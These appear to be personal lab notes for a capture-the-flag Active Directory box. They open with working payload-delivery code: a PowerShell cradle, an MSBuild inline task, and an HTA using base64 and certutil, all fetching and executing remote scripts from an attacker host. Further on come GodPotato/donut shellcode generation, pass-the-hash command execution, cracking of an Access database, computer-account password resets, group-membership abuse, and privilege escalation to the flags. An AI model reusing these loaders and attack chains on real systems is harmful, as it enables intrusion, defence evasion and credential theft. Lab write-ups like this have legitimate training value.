$url = "http://10.8.2.41/dropper.txt"
$scriptContent = (New-Object System.Net.WebClient).DownloadString($url)
Invoke-Expression $scriptContentvim sharp.xml
sharp.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
String cmd = @"(New-Object Net.WebClient).DownloadString('http://10.8.2.41/sharp.ps1') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
base64 -w 0 sharp.xml > sharp_base64.txt
cat sharp_base64.txt
vim sharp.hta
sharp.hta
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjguMi40MS9zaGFycC5wczEnKSB8IGlleCI7CiAgICAgICAgICAgIFJ1bnNwYWNlIHJzID0gUnVuc3BhY2VGYWN0b3J5LkNyZWF0ZVJ1bnNwYWNlKCk7CiAgICAgICAgICAgIHJzLk9wZW4oKTsKICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7CiAgICAgICAgICAgIHBzLlJ1bnNwYWNlID0gcnM7CiAgICAgICAgICAgIHBzLkFkZFNjcmlwdChjbWQpOwogICAgICAgICAgICBwcy5JbnZva2UoKTsKICAgICAgICAgICAgcnMuQ2xvc2UoKTsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CgoKICAgICAgICAgICAgICAgIH0KCgogICAgICAgICAgICB9CgoKCgogICAgICAgIF1dPgogICAgICA8L0NvZGU+CiAgICA8L1Rhc2s+CiAgPC9Vc2luZ1Rhc2s+CjwvUHJvamVjdD4K > c:\\windows\\temp\\enc6.txt;certutil -decode c:\\windows\\temp\\enc6.txt c:\\windows\\temp\\g.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\g.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
Create shortcut file
C:\Windows\System32\mshta.exe http://10.8.2.41/sharp.hta
SE Impersonate
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'
Getting Shells
cme smb 172.16.225.194 -u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://10.8.2.41/sharp.hta"(New-Object System.Net.WebClient).DownloadString('http://10.8.2.41/sharp.ps1') | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.8.2.41:80/sharp.ps1%27)%22
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/sharp.ps1')"
worked on this machine
mshta.exe http://10.8.2.41/sharp.hta
- Change sharp.ps1 to have sliverphollow64.txt
Enumeration
Nmap scan
sudo nmap -sC -sV -oA 10.10.86.206 10.10.86.206 -Pn
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-01 21:01:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2025-01-01T21:02:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2024-08-16T11:25:28
|_Not valid after: 2025-02-15T11:25:28
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Let’s change the /etc/hosts file to map the IP address to the the FQDN.
SMB enumeration
nxc smb 10.10.86.206 -u 'a' -p '' --shares
- Guest Access to the shares
- User Enumeration
nxc smb 10.10.86.206 -u 'a' -p '' --rid-brute
cat users.txt | awk '{print $6}' | cut -d '\' -f 2 >users.txt
- Found staff.accdb file on the public share.
Cracking accdb file password
office2john staff.accdb > password_hash_access_db_file_found_on_public_share
john password_hash_access_db_file_found_on_public_share --wordlist=/usr/share/wordlists/rockyou.txt
strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "ppYaVcB5R"- SMB singning is true and SMBv1 is allowed.
Blood Hound
nxc ldap 10.10.86.206 -u ldapreader -p password.txt --bloodhound -c All -d retro2.vl --dns-server 10.10.86.206
- FS01 is a pre created computer account so we can change the password using kpasswd. Pre created computer accounts have the same password as the computer account name just in small letters and without dollar sign.
sudo apt install krb5-user
hosts file
kpasswd FS01$
Password123!
Now we have control over FS01 computer account which has generic write over ADMWS01 computer account.
I thought of using RBCD but it needed aleast windows domain controller 2012 and above but we have windows server 2008.
shadowCredentials requires Windows Server 2016 or later).
Change password (works on 2008 and earlier)
net rpc password 'ADMWS01$' Password123! -U retro2.vl/'fs01$'%'Password123!' -S BLN01.retro2.vl
Now the Computer account ADMWS01 has Addself and Addmember attribute set for services group which can rdp to the domain controller. So we can the computer account to the group.
net rpc group addmem "Services" 'ADMWS01$' -U "retro2.vl"/"ADMWS01$"%"Password123!" -S "BLN01.retro2.vl"
net rpc group addmem "Services" 'ldapreader' -U "retro2.vl"/"ADMWS01$"%'Password123!' -S "BLN01.retro2.vl"
Check Group membership
nxc ldap 10.10.117.158 -u 'ldapreader' -p password.txt -M groupmembership -o USER=ADMWS01$
Now we can do RDP using ldapreader accout and ADMWS01$
xfreerdp /u:ldapreader /p:ppYaVcB5R /d:retro2.vl /v:10.10.117.158 /size:1800x924 /tls-seclevel:0
Getting the shell on sliver
mshta.exe http://10.8.2.41/sharp.hta
VL{3998adcb0ca6911b51cbf6492b365653}
PrivescCheck
Import-Module ./PrivescCheck.ps1
Invoke-PrivescCheck
https://github.com/itm4n/Perfusion
Perfusion.exe -c cmd -i
mshta.exe http://10.8.2.41/sharp.hta
VL{fcdb35fa749e2e65fb16e69ed1d6a146}